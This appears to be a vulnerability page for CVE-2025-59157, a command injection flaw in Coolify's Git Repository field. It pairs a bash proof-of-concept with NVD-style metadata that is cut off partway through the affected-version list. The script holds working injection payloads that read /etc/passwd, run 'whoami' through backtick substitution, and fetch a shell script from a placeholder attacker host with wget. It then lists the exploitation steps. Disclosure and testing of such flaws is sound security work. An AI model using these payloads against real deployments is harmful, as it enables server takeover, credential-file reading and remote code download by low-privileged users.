CVE-2025-59157

#!/bin/bash # CVE-2025-59157 PoC - Coolify Command Injection in Git Repository Field # This PoC demonstrates command injection via the Git Repository field # Target: Coolify < 4.0.0-beta.420.7 # Payload construction for command injection # Using semicolon to chain commands PAYLOAD='https://github.com/example/repo;cat /etc/passwd > /tmp/pwned' # Alternative payload using backticks for command substitution PAYLOAD_ALT='https://github.com/example/repo`whoami`' # Alternative payload using pipe to chain commands PAYLOAD_PIPE='https://github.com/example/repo|wget http://attacker.com/shell.sh' echo "[*] CVE-2025-59157 - Coolify Command Injection" echo "[*] Target: Coolify < 4.0.0-beta.420.7" echo "[*] Attack Vector: Git Repository field during project creation" echo "" echo "[!] Note: This is for educational and authorized testing purposes only" echo "[!] Exploitation steps:" echo "1. Authenticate as a regular member user" echo "2. Navigate to project creation page" echo "3. In the Git Repository field, enter the malicious URL with injected commands" echo "4. Submit the project creation form" echo "5. The injected commands will be executed when Coolify processes the Git repository"

{"cve": {"id": "CVE-2025-59157", "sourceIdentifier": "[email protected]", "published": "2026-01-05T18:15:43.643", "lastModified": "2026-01-12T15:02:21.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.420.7, the Git Repository field during project creation is vulnerable to command injection. User input is not properly sanitized, allowing attackers to inject arbitrary shell commands that execute on the underlying server during the deployment workflow. A regular member user can exploit this vulnerability. Version 4.0.0-beta.420.7 contains a patch for the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.0.0", "matchCriteriaId": "FCAEF3B5-C3E0-4DC5-99AC-A9820DE3EA4D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta100:*:*:*:*:*:*", "matchCriteriaId": "DD128680-A34B-4D2A-B44A-53FC4E406393"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta101:*:*:*:*:*:*", "matchCriteriaId": "51CEE245-2E82-4928-A900-E7F628B47336"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta102:*:*:*:*:*:*", "matchCriteriaId": "B0C45118-3AE6-443B-8CD9-B2B72CD24383"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta103:*:*:*:*:*:*", "matchCriteriaId": "004E8E36-44E8-4F64-8E2D-8804DF161CD7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta104:*:*:*:*:*:*", "matchCriteriaId": "BC538E12-494F-47EF-8D53-2D7CDAED98BC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta105:*:*:*:*:*:*", "matchCriteriaId": "54F12C6A-07B5-42F9-9AE6-281AA189BFF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta106:*:*:*:*:*:*", "matchCriteriaId": "A1936F5B-2A32-4353-A4EA-A337C3A2D8C5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta107:*:*:*:*:*:*", "matchCriteriaId": "B3A90F6B-070F-469F-8206-AE9DFBCE6B61"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta108:*:*:*:*:*:*", "matchCriteriaId": "EB776310-84B4-4CC8-B547-5D6A37EF5ECC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta109:*:*:*:*:*:*", "matchCriteriaId": "BF168BC8-E283-40FB-9B28-D048C25BD36F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta110:*:*:*:*:*:*", "matchCriteriaId": "7DDE09ED-3AF5-4B0E-9F69-3B7B05862A7C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta111:*:*:*:*:*:*", "matchCriteriaId": "2C5174EF-25CC-43DB-B62D-9DA4C9FF640E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta112:*:*:*:*:*:*", "matchCriteriaId": "E30EACD4-2556-4A58-8899-810D5D3DEE84"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta113:*:*:*:*:*:*", "matchCriteriaId": "C3FA74D4-46BA-4E89-8DB0-C8114139C8D7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta114:*:*:*:*:*:*", "matchCriteriaId": "A520EFF3-97CE-4FBE-A79E-F7CED9876BE6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta115:*:*:*:*:*:*", "matchCriteriaId": "4FA1C04E-1A8E-412E-B68A-B48CEF5A78BF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta116:*:*:*:*:*:*", "matchCriteriaId": "29DB7B76-A127-4F68-96CD-4285E0FFDDF0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta117:*:*:*:*:*:*", "matchCriteriaId": "4F9E71F6-38C1-4649-B69F-F6AF6063FA09"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta118:*:*:*:*:*:*", "matchCriteriaId": "A6132969-37D9-4DF1-BFBB-8DD3C4D9434E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:coollabs:coolify:4.0.0:beta1 ... (truncated)